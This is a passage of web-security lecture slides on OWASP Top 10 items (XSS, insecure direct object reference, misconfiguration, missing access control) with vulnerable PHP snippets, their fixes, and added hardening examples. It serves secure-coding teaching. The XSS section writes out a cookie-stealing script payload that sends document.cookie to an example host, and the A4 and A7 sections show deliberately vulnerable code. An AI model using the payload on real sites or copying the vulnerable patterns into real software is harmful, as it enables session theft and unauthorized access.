2. A3 – Cross-Site Scripting (XSS)
● Whenever untrusted data is sent to the browser without proper validation and escaping!
● XSS allows the attacker to OWN the victim's browser and do ... everything!
● Stored, Reflected and DOM-based XSS
3. A3 – steal user cookie
<?php
// page prone to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= $_REQUEST['search']; ?></p>   <!-- user input echoed without escaping -->
<?= render_results($results); ?>
</body>
</html>
// set search to: "<script>document.location='http://www.example.com/precious_cookie?cookie='+document.cookie</script>"
<?php
// same page, with the search term escaped before it reaches the browser
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= htmlentities($_REQUEST['search'], ENT_COMPAT | ENT_HTML401, 'UTF-8'); ?></p>
<!-- ENT_COMPAT is enough for an HTML text node; use ENT_QUOTES when the value lands inside an attribute -->
<?= render_results($results); ?>
</body>
</html>
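The escaped version above handles the text-node case. The following added example (not from the original slides) extends it to the other two places the same search term typically ends up, an HTML attribute and a JavaScript string, and checks that the slide's cookie-stealing payload no longer survives in executable form. The helper names and the page layout are this example's own; the payload is the one from the slide.

```php
<?php
// Added example: context-aware output escaping for the search page.
// escapeHtml/escapeJs/renderSearchPage/containsRawPayload are constructed
// for this demo; only the payload string comes from the slide.

// Escape for an HTML text node or a quoted attribute value.
// ENT_QUOTES also converts single quotes, so the result is safe inside
// attributes delimited by either quote character.
function escapeHtml(string $value): string
{
    return htmlentities($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Escape for a JavaScript string literal inside a <script> block.
// The JSON_HEX_* flags turn <, >, &, ' and " into \uXXXX escapes, so the
// browser never sees a literal "</script>" inside the string.
function escapeJs(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Render the results page with the search term escaped for each context.
function renderSearchPage(string $search): string
{
    $safeHtml = escapeHtml($search);
    $safeJs   = escapeJs($search);
    return "<html><body>\n"
         . "<p>results for : {$safeHtml}</p>\n"
         . "<input type=\"text\" name=\"search\" value=\"{$safeHtml}\">\n"
         . "<script>var lastSearch = {$safeJs};</script>\n"
         . "</body></html>\n";
}

// True when the rendered page still contains the payload verbatim,
// i.e. a raw <script> tag the browser would execute.
function containsRawPayload(string $page, string $payload): bool
{
    return strpos($page, $payload) !== false;
}

// Constructed request: the cookie-stealing payload from the slide.
$payload = "<script>document.location='http://www.example.com/precious_cookie"
         . "?cookie='+document.cookie</script>";

$page = renderSearchPage($payload);
echo $page;
var_dump(containsRawPayload($page, $payload));
```

Run it from the command line (`php xss_escape.php`): the payload appears three times in the output, each time as inert entity or \u escapes, and the final check reports that no raw copy remains. The point of having two escaping functions is that one escaper does not fit every context; a value that is safe in a text node is not automatically safe inside a `<script>` block.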
4. A4 – Insecure Direct Object Reference
● Whenever a developer exposes references to internal objects and doesn't have proper access control.
● Attackers can change the references and access resources that shouldn't be accessible.
5. A4 – Access other user account
<?php
// prone to insecure direct reference
// script.php?account=10
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
echo render_account_info($account);
// and if I change account to "9" ?

<?php
// same page, checking that the logged-in user may read the requested account
// script.php?account=10
$user = new User($_SESSION['userInfo']);
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
if ($account->canRead($user)) {
    echo render_account_info($account);
} else {
    echo "Access denied";
}
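The slide calls `canRead()` but does not show what it does. The added example below (not from the original slides) implements it as an ownership check on server-side data and wraps it in a request handler that can be run against a few constructed accounts. The `User`, `Account` and `handleAccountRequest` definitions and the sample data are this example's own.

```php
<?php
// Added example: an ownership-based canRead() and a handler that enforces it.
// Classes, users and account data are constructed for this demo (PHP 8+).

class User
{
    public function __construct(public int $id, public bool $isAdmin = false) {}
}

class Account
{
    public function __construct(public int $id, public int $ownerId, public string $balance) {}

    // Only the owner (or an admin) may read this account. The decision rests
    // on data the server controls, never on anything taken from the request.
    public function canRead(User $user): bool
    {
        return $user->isAdmin || $user->id === $this->ownerId;
    }
}

// Constructed in-memory "database": account id => Account
$accounts = [
    9  => new Account(9,  ownerId: 1, balance: '1200.00'),
    10 => new Account(10, ownerId: 2, balance: '35.50'),
];

// Handle script.php?account=<id> on behalf of the logged-in user.
function handleAccountRequest(array $request, User $loggedUser, array $accounts): string
{
    $accountId = intval($request['account'] ?? 0);
    $account = $accounts[$accountId] ?? null;

    // Answer identically for missing and forbidden accounts, so the response
    // does not reveal which ids exist.
    if ($account === null || !$account->canRead($loggedUser)) {
        return 'Access denied';
    }
    return "account {$account->id}: balance {$account->balance}";
}

$alice = new User(id: 2); // owns account 10
echo handleAccountRequest(['account' => '10'], $alice, $accounts), "\n"; // her own account
echo handleAccountRequest(['account' => '9'],  $alice, $accounts), "\n"; // someone else's account
echo handleAccountRequest(['account' => '42'], $alice, $accounts), "\n"; // no such account
```

Changing the `account` parameter from 10 to 9 now yields the same "Access denied" as a non-existent id, because the check compares the record's owner with the session user rather than trusting the reference the client supplied.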
6. A5 – Security Misconfiguration
● Failing to secure the full stack often leads to applications / servers being compromised.
● Take into consideration other services / applications running in the same infrastructure.
● Watch out for outdated software.
● Watch out for default accounts.
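The bullets above name the problem but not what "securing the stack" looks like for the PHP runtime itself. The added example below (not from the original slides) audits a handful of php.ini directives that ship with insecure values in many default or development configurations and reports the ones that differ from a hardened setting. The directive list, the chosen expected values and the sample development configuration are this example's own selection; the directive names are real PHP settings.

```php
<?php
// Added example: audit PHP runtime settings against hardened values.
// HARDENING_CHECKS and the sample "development" configuration are
// constructed for this demo; ini_get() reads the live interpreter.

// directive => [hardened value, what goes wrong when it is not set]
const HARDENING_CHECKS = [
    'display_errors'          => ['0', 'stack traces and file paths leak to the browser'],
    'expose_php'              => ['0', 'X-Powered-By header reveals the exact PHP version'],
    'allow_url_include'       => ['0', 'include() can pull code from a remote URL'],
    'session.cookie_httponly' => ['1', 'session cookie is readable by injected script'],
    'session.cookie_secure'   => ['1', 'session cookie is sent over plain HTTP'],
    'session.use_strict_mode' => ['1', 'server accepts session ids it never issued'],
];

// ini values arrive as "1"/"", "On"/"Off", "true"/"false" depending on how
// they were set; reduce them to "1" or "0" before comparing.
function normalizeFlag(string $value): string
{
    return in_array(strtolower($value), ['1', 'on', 'true', 'yes'], true) ? '1' : '0';
}

// Returns one finding per directive whose value differs from the hardened one.
function auditPhpConfig(array $settings): array
{
    $findings = [];
    foreach (HARDENING_CHECKS as $directive => [$expected, $risk]) {
        $actual = normalizeFlag((string) ($settings[$directive] ?? ''));
        if ($actual !== $expected) {
            $findings[] = [
                'directive' => $directive,
                'actual'    => $actual,
                'expected'  => $expected,
                'risk'      => $risk,
            ];
        }
    }
    return $findings;
}

function printFindings(string $label, array $findings): void
{
    echo "== {$label}: " . count($findings) . " finding(s)\n";
    foreach ($findings as $f) {
        echo "  {$f['directive']} = {$f['actual']} (want {$f['expected']}): {$f['risk']}\n";
    }
}

// 1. A constructed configuration typical of a development box copied to production.
$devConfig = [
    'display_errors'          => 'On',
    'expose_php'              => 'On',
    'allow_url_include'       => 'Off',
    'session.cookie_httponly' => '',
    'session.cookie_secure'   => '0',
    'session.use_strict_mode' => '0',
];
printFindings('sample development config', auditPhpConfig($devConfig));

// 2. The interpreter this script is running under.
$live = [];
foreach (array_keys(HARDENING_CHECKS) as $directive) {
    $live[$directive] = (string) ini_get($directive);
}
printFindings('live interpreter', auditPhpConfig($live));
```

The sample configuration produces five findings (only `allow_url_include` passes). Running the script under the real interpreter is a quick way to see whether a deployment still carries development settings; the same pattern extends to any other directive whose hardened value is known.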
7. A7 – Missing Function Level Access Control
● Most applications validate function-based access control before displaying options in the UI, but fail to validate when the function is actually accessed.
● An attacker can forge requests to functions that shouldn't be available.
8. A7 – insecure function
<?php
// prone to insecure function access
// script.php?user=john&action=read
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$user   = new User($userId);
switch ($action) {
    case 'read':
        echo render_user($user);
        break;
    case 'delete':
        $user->delete();
        echo "user Deleted";
        break;
}
// and if I change action to "delete"?

<?php
// same page, checking the logged-in user's rights before each action
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$loggedUser = new AppUser($_SESSION['userInfo']);
$user = new User($userId);
switch ($action) {
    case 'read':
        if ($user->canRead($loggedUser)) {
            echo render_user($user);
        }
        break;
    case 'delete':
        if ($user->canDelete($loggedUser)) {
            $user->delete();
            echo "user Deleted";
        }
        break;
}
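The fixed version above adds a check inside each `case`, which works but has to be repeated for every action added later. The added example below (not from the original slides) moves the decision into a single `authorize()` gate that runs before any handler and denies anything not explicitly listed, so a new or misspelled action cannot slip through. The `AppUser`/`User` classes, the `ACTION_ROLES` table and the sample requests are this example's own.

```php
<?php
// Added example: one authorization choke point in front of the dispatcher,
// deny-by-default for unknown actions. Classes, the permission table and
// the sample users are constructed for this demo (PHP 8+).

class AppUser
{
    public function __construct(public string $name, public array $roles) {}
}

class User
{
    public bool $deleted = false;
    public function __construct(public string $id) {}
    public function delete(): void { $this->deleted = true; }
}

// action => roles allowed to perform it; any action not listed is denied
const ACTION_ROLES = [
    'read'   => ['user', 'admin'],
    'delete' => ['admin'],
];

// Every request passes through here before a handler runs.
function authorize(AppUser $actor, string $action, User $target): bool
{
    if (!isset(ACTION_ROLES[$action])) {
        return false; // unknown action: deny by default
    }
    $isAdmin = in_array('admin', $actor->roles, true);
    // an ordinary user may only read their own record
    if ($action === 'read' && !$isAdmin) {
        return $actor->name === $target->id;
    }
    return count(array_intersect(ACTION_ROLES[$action], $actor->roles)) > 0;
}

// Handle script.php?user=<id>&action=<name>; returns the response text.
function handleUserRequest(array $request, AppUser $actor, User $target): string
{
    $action = (string) ($request['action'] ?? '');
    if (!authorize($actor, $action, $target)) {
        return 'Access denied';
    }
    switch ($action) {
        case 'read':
            return "user {$target->id}";
        case 'delete':
            $target->delete();
            return 'user Deleted';
    }
    return 'Access denied'; // not reachable after authorize(), kept so the default stays deny
}

$john    = new User('john');
$johnApp = new AppUser('john', ['user']);
$mallory = new AppUser('mallory', ['user']);
$admin   = new AppUser('root', ['admin']);

echo handleUserRequest(['user' => 'john', 'action' => 'read'],   $johnApp, $john), "\n"; // own record
echo handleUserRequest(['user' => 'john', 'action' => 'read'],   $mallory, $john), "\n"; // someone else's record
echo handleUserRequest(['user' => 'john', 'action' => 'delete'], $mallory, $john), "\n"; // forged action, wrong role
echo handleUserRequest(['user' => 'john', 'action' => 'export'], $admin,   $john), "\n"; // action nobody defined
echo handleUserRequest(['user' => 'john', 'action' => 'delete'], $admin,   $john), "\n"; // permitted
```

Changing `action=read` to `action=delete` in the URL now hits the same gate as every other request, and an action that was never registered in `ACTION_ROLES` is refused even for an administrator. Keeping the table next to the dispatcher also makes the authorization policy reviewable in one place instead of scattered across `case` branches.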
9. A9 – Using Components with Known Vulnerabilities
● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities.
● Attackers can leverage these issues to attack your application / server / etc.